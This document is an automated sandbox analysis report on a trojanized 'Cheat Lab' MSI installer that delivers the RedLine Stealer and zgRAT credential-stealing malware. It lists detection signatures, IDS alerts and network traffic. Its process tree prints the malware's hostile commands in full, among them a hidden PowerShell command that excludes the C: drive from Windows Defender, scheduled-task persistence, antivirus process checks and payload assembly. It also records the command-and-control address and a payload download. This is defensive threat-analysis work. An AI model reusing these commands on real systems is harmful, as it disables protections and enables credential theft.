Windows Analysis Report
Cheat.Lab.2.7.2.msi

Overview

General Information

Sample name:Cheat.Lab.2.7.2.msi
Analysis ID:1374044
MD5:9014acfca65fca4bdf8b5f561c4a1783
SHA1:c8fcdefb8ba4f700801fc0e97811661fa972de30
SHA256:efea578cdac3d52601d43b6c4570d94e8fcbdd701573b33612551050e8246cd2
Tags:msi
Infos:

Detection

RedLine, zgRAT
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Contains functionality to register a low level keyboard hook
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Drops large PE files
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 6428 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6524 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6128 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 30FEA9F9E3926AA1391EB6E446524DF5 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • compiler.exe (PID: 7808 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config MD5: E1985F2668B7617E122FE727315B6D07)
    • msiexec.exe (PID: 4856 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F28D3D46A9F6C7BEC118E0AE5C649DD3 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 5084 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss87C.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi86A.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr86B.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr86C.txt" -propSep " :<->: " -testPrefix "_testValue." MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7256 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -Command "& { & 'Add-MpPreference' -ExclusionExtension '.dll', '.exe' -ExclusionPath C: -Force } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • msiexec.exe (PID: 7672 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding AF5482846545A3FBF6C3EBE62A323063 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • compiler.exe (PID: 7720 cmdline: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\config MD5: E1985F2668B7617E122FE727315B6D07)
    • powershell.exe (PID: 8144 cmdline: powershell -Command "Register-ScheduledTask -TaskName 'Y29ubmVjdDc0MQ==' -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe') -Trigger (New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(1) -Once) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable) -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • connect.exe (PID: 7304 cmdline: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe MD5: B9DD622108F62A2288DEB12C8A7D85BA)
    • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3120 cmdline: "C:\Windows\System32\cmd.exe" /k cmd < Roommates & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1188 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • tasklist.exe (PID: 6108 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7580 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 7032 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7184 cmdline: findstr /I "wrsa.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7252 cmdline: cmd /c mkdir 28945 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6536 cmdline: cmd /c copy /b Dns + Pontiac + Milfhunter + Ruling + Supervisor 28945\Carbon.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 7668 cmdline: cmd /c copy /b Entered + Conferences 28945\w MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Carbon.pif (PID: 2316 cmdline: 28945\Carbon.pif 28945\w MD5: 848164D084384C49937F99D5B894253E)
          • jsc.exe (PID: 7848 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe MD5: 94C8E57A80DFCA2482DEDB87B93D4FD9)
            • qemu-ga.exe (PID: 6560 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe" MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
        • PING.EXE (PID: 180 cmdline: ping -n 5 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • qemu-ga.exe (PID: 2148 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe" MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: zgRAT
Description: zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000001D.00000003.2894002689.0000000003959000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000001D.00000003.2951972819.00000000038AC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000001D.00000003.2894424466.00000000039FB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
29.3.Carbon.pif.39a94e8.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
29.3.Carbon.pif.39a94e8.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
29.3.Carbon.pif.39a94e8.1.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen | (strings listed below)
  • 0x331a5:$s1: file:///
  • 0x33101:$s2: {11111-22222-10009-11112}
  • 0x33135:$s3: {11111-22222-50001-00000}
  • 0x30d07:$s4: get_Module
  • 0x2cd5a:$s5: Reverse
  • 0x2d506:$s6: BlockCopy
  • 0x2cd42:$s7: ReadByte
  • 0x331b7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
29.3.Carbon.pif.39a94e8.5.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
29.3.Carbon.pif.39a94e8.5.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

No Sigma rule has matched
Timestamp:01/12/24-23:14:10.418901
Source IP:192.168.2.4
Destination IP:45.15.156.186
SID:2046045
Source Port:49741
Destination Port:29975
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:01/12/24-23:14:10.955529
Source IP:45.15.156.186
Destination IP:192.168.2.4
SID:2046056
Source Port:29975
Destination Port:49741
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\config
Source: C:\Windows\System32\msiexec.exe | Directory created: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: Z:\7zsfxmm-51139022f6d790da60884077b63b2f265052be0b\Output\Win32\7ZSfxMod.pdb source: connect.exe, 00000010.00000000.2470216171.0000000000426000.00000002.00000001.01000000.00000009.sdmp, connect.exe, 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe | Code function: 11_2_00007FF7BADC412C FindFirstFileExW,11_2_00007FF7BADC412C
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 16_2_00404399 FindFirstFileW,FindClose,SetLastError,CompareFileTime,16_2_00404399
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 16_2_00403C8F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,16_2_00403C8F
Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe | Code function: 16_2_00403DA4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,16_2_00403DA4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_0095E1AC GetFileAttributesW,FindFirstFileW,FindClose,29_2_0095E1AC
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_0095D65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D65B
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_0095D98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_0095D98E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_0096A29A FindFirstFileW,Sleep,FindNextFileW,FindClose,29_2_0096A29A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_00966406 FindFirstFileW,FindNextFileW,FindClose,29_2_00966406
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_009670FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,29_2_009670FE
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_0096705D FindFirstFileW,FindClose,29_2_0096705D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_00969DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969DB1
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_00969F0C SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_00969F0C
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pontiac
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Dns
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

Networking

Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49741 -> 45.15.156.186:29975
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 45.15.156.186:29975 -> 192.168.2.4:49741
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: global traffic | TCP traffic: 192.168.2.4:49741 -> 45.15.156.186:29975
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 213.248.43.48
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pif | Code function: 29_2_0096D5B3 InternetReadFile,SetEvent,GetLastError,SetEvent,29_2_0096D5B3
Source: global traffic | HTTP traffic detected: GET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1 | User-Agent: Winter | Cache-Control: no-cache | Host: cdn.discordapp.com | Connection: Keep-Alive | Cookie: __cf_bm=NQ8hsNROJ4ECPUpzUwnJbG9uTPemeuU4i_wUYe2S75I-1705097558-1-AePzRORzeAr0iGC0qs1nWkncA+Psk0Y78fhnqrbDbP9Mw6fKoc9CI0A1E5NudBf115BY9/I6p8WSeSfkX3sogw4=; _cfuvid=Gm5WzVXIL6HX9Y_BYTeLwclnnr06fyZHUxgDMI2R4MA-1705097558055-0-604800000
Source: global traffic | HTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1 | Content-Type: application/json | User-Agent: Winter | Host: ip-api.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /attachments/1194585859404599367/1194585905420320788/2 HTTP/1.1 | Content-Type: application/json | User-Agent: Winter | Host: cdn.discordapp.com | Cache-Control: no-cache
Source: unknown | DNS traffic detected: queries for: ip-api.com
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: connect.exe, 00000010.00000003.2498819056.0000000002800000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globign.com/rootr306
Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1734682756.00000203CD708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: powershell.exe, 0000000E.00000002.2557762473.0000022F4BFB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 0000000E.00000002.2561242498.0000022F4C092000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000004.00000002.1808676606.0000022C41211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1734682756.00000203CD4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2417024179.0000022F33CB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000E.00000002.2417024179.0000022F33ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000004.00000002.1808676606.0000022C41E42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: compiler.exe, 0000000B.00000000.1900902817.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://luajit.org/
                        Source: powershell.exe, 00000004.00000002.1857206800.0000022C513C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808676606.0000022C42C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1857206800.0000022C5128F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1750185508.00000203DD553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2542608949.0000022F43D1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                        Source: connect.exe, 00000010.00000003.2498656765.0000000002905000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49739 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 16_2_00408F95 SetWindowsHookExW 00000002,Function_00009F2A,00000000,0000000016_2_00408F95
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096F286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,29_2_0096F286
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0096F4F1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,29_2_0096F4F1
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_0095A36F GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,29_2_0095A36F
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWindow created: window name: CLIPBRDWNDCLASS
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifCode function: 29_2_00989C62 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,29_2_00989C62

                        System Summary

